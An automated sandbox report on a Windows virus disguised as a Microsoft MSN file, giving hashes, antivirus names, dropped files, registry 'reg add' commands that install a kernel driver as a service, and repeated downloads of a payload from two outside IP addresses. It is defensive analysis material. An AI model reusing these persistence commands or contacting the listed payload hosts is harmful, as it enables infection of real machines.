Analysis Date2016-02-20 03:15:28
MD5ad6225c5f0c7d5a8f11c8aca865dd990
SHA187eb790f29d5551882452cb2d732df47b80ba95a

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: d796e4ff5c4d9c5ca2d1b90272d6d6b8 sha1: 0755e4acb128a57a55d97d2e967825b0a5393d30 size: 65536
Section.data md5: 789f8dbcfc8423c0c1058375d02239bf sha1: f0b25955806641c0017dfcc1eaafd33c8c24a187 size: 4096
Section.rsrc md5: 95c3a4840354bf62ec32d7ce9f5c6cb2 sha1: 2b3cddb7b110e371697ebf99e4de9d01e8674e77 size: 4096
Section[cc md5: 05430e4a5e4a37feecf0a9eadb7240f8 sha1: 3c0a32551c70db5be0425fe0189178e2e1c0f0e4 size: 94208
Timestamp2001-07-19 19:30:07
Pdb pathpdb
VersionLegalCopyright: Copyright (C) Microsoft Corp. 1981-2000
InternalName: copymar
FileVersion: 6.10.0016.1624
CompanyName: Microsoft Corporation
Built by: msnbld
ProductName: Microsoft(R) MSN (R) Communications System
ProductVersion: 6.10.0016.1624
FileDescription: copymar
OriginalFilename: copymar.exe
LegalCopyright: Copyright (C) Microsoft Corp. 1981-2000
InternalName: copymar
FileVersion: 6.10.0016.1624
CompanyName: Microsoft Corporation
Built by: msnbld
ProductName: Microsoft(R) MSN (R) Communications System
ProductVersion: 6.10.0016.1624
FileDescription: copymar
OriginalFilename: copymar.exe
PackerBorland Delphi 3.0 (???)
PEhashc3816c608d19378522b754b62b90aef1314770e3
IMPhash6df6e99bae10817058127898c796b82d
AVCA (E-Trust Ino)Win32.Viking.AZ
AVRisingWin32.Cmt.b
AVMcafeeW32/Fujacks.be
AVAvira (antivir)W32/Viking.AT
AVTwisterVirus.7DFCDC175595EB59
AVAd-AwareWin32.Viking.AZ
AVAlwil (avast)Win32:Malware-gen
AVEset (nod32)Win32/Wapomi.A virus
AVGrisoft (avg)Win32/Wapomi.D
AVSymantecW32.Wapomi!inf
AVFortinetW32/Krypt.C!tr.bdr
AVBitDefenderWin32.Viking.AZ
AVK7Virus ( 700000081 )
AVMicrosoft Security EssentialsVirus:Win32/Jadtre.F
AVMicroWorld (escan)Win32.Viking.AZ
AVMalwareBytesTrojan.FakeMS.ED
AVAuthentiumW32/Pikor.A
AVEmsisoftWin32.Viking.AZ
AVFrisk (f-prot)W32/Pikor.A
AVIkarusVirus.Win32.Qvod
AVZillya!Virus.Qvod.Win32.4
AVKasperskyVirus.Win32.Qvod.a
AVTrend MicroPE_PIKOR.A
AVVirusBlokAda (vba32)Virus.Win32.Qvod.a
AVCAT (quickheal)W32.Pikroms.A
AVBullGuardWin32.Viking.AZ
AVArcabit (arcavir)Win32.Viking.AZ
AVClamAVVirus.Qvod
AVDr. WebTrojan.Starter.1410
AVF-SecureWin32.Viking.AZ

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\cmt.exe
Creates ProcessC:\cmt.exe

Process
↳ C:\cmt.exe

Creates FileC:\WINDOWS\system32\appmgmts.dll
Creates FilePIPE\SfcApi
Creates FileC:\Documents and Settings\Infotmp.txt
Starts ServiceAppMgmt

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 808

Process
↳ Pid 856

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AppMgmt\Start ➝
2
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝
NULL
Creates File\Device\00000027
Creates File\Device\00000025
Creates FileC:\WINDOWS\system32\drivers\1BBC6C10.sys
Creates FileC:\WINDOWS\system32\drivers\etc\hosts
Creates FileC:\WINDOWS\TEMP\s2eec3e89.txt
Creates File\Device\0000002F
Creates FileNewDev
Creates FileC:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates File\Device\0000002A
Creates File\Device\00000026
Creates File\Device\00000002
Creates File\Device\00000003
Creates File\Device\00000029
Creates File\Device\00000028
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log
Deletes FileC:\WINDOWS\TEMP\s2eec3e89.txt
Deletes FileC:\Documents and Settings\Infotmp.txt
Deletes FileC:\cmt.exe
Deletes FileC:\WINDOWS\TEMP\r6d48127a.txt
Creates Processreg add HKLM\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641} /v Service /t REG_SZ /d 1BBC6C10 /f
Creates Processreg export HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt C:\WINDOWS\TEMP\r6d48127a.txt
Creates Processreg add HKLM\SYSTEM\CurrentControlSet\Services\1BBC6C10 /v ErrorControl /t REG_DWORD /d 1 /f
Creates Processreg add HKLM\SYSTEM\CurrentControlSet\Services\1BBC6C10 /v Type /t REG_DWORD /d 1 /f
Creates Processreg add HKLM\SYSTEM\CurrentControlSet\Services\1BBC6C10 /v Start /t REG_DWORD /d 2 /f
Creates Processreg add HKLM\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641} /v ConfigFlags /t REG_DWORD /d 0 /f
Creates Processreg add HKLM\SYSTEM\CurrentControlSet\Services\1BBC6C10 /v ImagePath /t REG_EXPAND_SZ /d system32\drivers\1BBC6C10.sys /f

Process
↳ Pid 1212

Process
↳ C:\WINDOWS\system32\spoolsv.exe

RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers\LogonTime ➝
NULL
Creates FileWMIDataDevice

Process
↳ Pid 1872

Process
↳ Pid 1160

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641} /v Service /t REG_SZ /d 1BBC6C10 /f

RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641}\Service ➝
1BBC6C10\\x00

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641} /v ConfigFlags /t REG_DWORD /d 0 /f

RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641}\ConfigFlags ➝
NULL

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Services\1BBC6C10 /v Start /t REG_DWORD /d 2 /f

RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\1BBC6C10\Start ➝
2

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Services\1BBC6C10 /v Type /t REG_DWORD /d 1 /f

RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\1BBC6C10\Type ➝
1

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Services\1BBC6C10 /v ImagePath /t REG_EXPAND_SZ /d system32\drivers\1BBC6C10.sys /f

RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\1BBC6C10\ImagePath ➝
system32\drivers\1BBC6C10.sys\\x00

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Services\1BBC6C10 /v ErrorControl /t REG_DWORD /d 1 /f

RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\1BBC6C10\ErrorControl ➝
1

Process
↳ reg export HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt C:\WINDOWS\TEMP\r6d48127a.txt

Creates FileC:\WINDOWS\TEMP\r6d48127a.txt

Network Details:

DNSwww.a.shifen.com
Type: A
103.235.46.39
DNSwww.a.shifen.com
Type: A
103.235.46.39
DNS472146.parkingcrew.net
Type: A
185.53.177.30
DNS53.WAP517.NET
Type: A
193.166.255.171
DNSwww.baidu.com
Type: A
DNS53.WAP517.BIZ
Type: A
DNS53.WAP517.US
Type: A
DNS53.NS1631261.COM
Type: A
DNS53.NS1631262.COM
Type: A
DNS53.NS1631262.INFO
Type: A
DNS53.NS1631262.NET
Type: A
DNS53.NS1631262.ORG
Type: A
DNS53.NS1631263.COM
Type: A
DNS53.NS1631263.INFO
Type: A
DNS53.NS1631263.NET
Type: A
DNS53.NS1631263.ORG
Type: A
HTTP GEThttp://185.53.177.30:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GEThttp://193.166.255.171:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GEThttp://185.53.177.30:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GEThttp://193.166.255.171:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GEThttp://185.53.177.30:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GEThttp://193.166.255.171:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GEThttp://185.53.177.30:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GEThttp://193.166.255.171:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GEThttp://185.53.177.30:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GEThttp://193.166.255.171:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Flows TCP192.168.1.1:1032 ➝ 185.53.177.30:8080
Flows TCP192.168.1.1:1033 ➝ 193.166.255.171:8080
Flows TCP192.168.1.1:1034 ➝ 185.53.177.30:8080
Flows TCP192.168.1.1:1035 ➝ 193.166.255.171:8080
Flows TCP192.168.1.1:1036 ➝ 185.53.177.30:8080
Flows TCP192.168.1.1:1037 ➝ 193.166.255.171:8080
Flows TCP192.168.1.1:1038 ➝ 185.53.177.30:8080
Flows TCP192.168.1.1:1039 ➝ 193.166.255.171:8080
Flows TCP192.168.1.1:1040 ➝ 185.53.177.30:8080
Flows TCP192.168.1.1:1041 ➝ 193.166.255.171:8080

Raw Pcap
0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2031 38352e35 332e3137   .Host: 185.53.17
0x000000d0 (00208)   372e3330 0d0a436f 6e6e6563 74696f6e   7.30..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2031 39332e31 36362e32   .Host: 193.166.2
0x000000d0 (00208)   35352e31 37310d0a 436f6e6e 65637469   55.171..Connecti
0x000000e0 (00224)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000f0 (00240)   0d0a                                  ..

0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2031 38352e35 332e3137   .Host: 185.53.17
0x000000d0 (00208)   372e3330 0d0a436f 6e6e6563 74696f6e   7.30..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)   0d0a                                  ..

0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2031 39332e31 36362e32   .Host: 193.166.2
0x000000d0 (00208)   35352e31 37310d0a 436f6e6e 65637469   55.171..Connecti
0x000000e0 (00224)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000f0 (00240)   0d0a                                  ..

0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2031 38352e35 332e3137   .Host: 185.53.17
0x000000d0 (00208)   372e3330 0d0a436f 6e6e6563 74696f6e   7.30..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)   0d0a                                  ..

0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2031 39332e31 36362e32   .Host: 193.166.2
0x000000d0 (00208)   35352e31 37310d0a 436f6e6e 65637469   55.171..Connecti
0x000000e0 (00224)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000f0 (00240)   0d0a                                  ..

0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2031 38352e35 332e3137   .Host: 185.53.17
0x000000d0 (00208)   372e3330 0d0a436f 6e6e6563 74696f6e   7.30..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)   0d0a                                  ..

0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2031 39332e31 36362e32   .Host: 193.166.2
0x000000d0 (00208)   35352e31 37310d0a 436f6e6e 65637469   55.171..Connecti
0x000000e0 (00224)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000f0 (00240)   0d0a                                  ..

0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2031 38352e35 332e3137   .Host: 185.53.17
0x000000d0 (00208)   372e3330 0d0a436f 6e6e6563 74696f6e   7.30..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)   0d0a                                  ..

0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2031 39332e31 36362e32   .Host: 193.166.2
0x000000d0 (00208)   35352e31 37310d0a 436f6e6e 65637469   55.171..Connecti
0x000000e0 (00224)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000f0 (00240)   0d0a                                  ..


Strings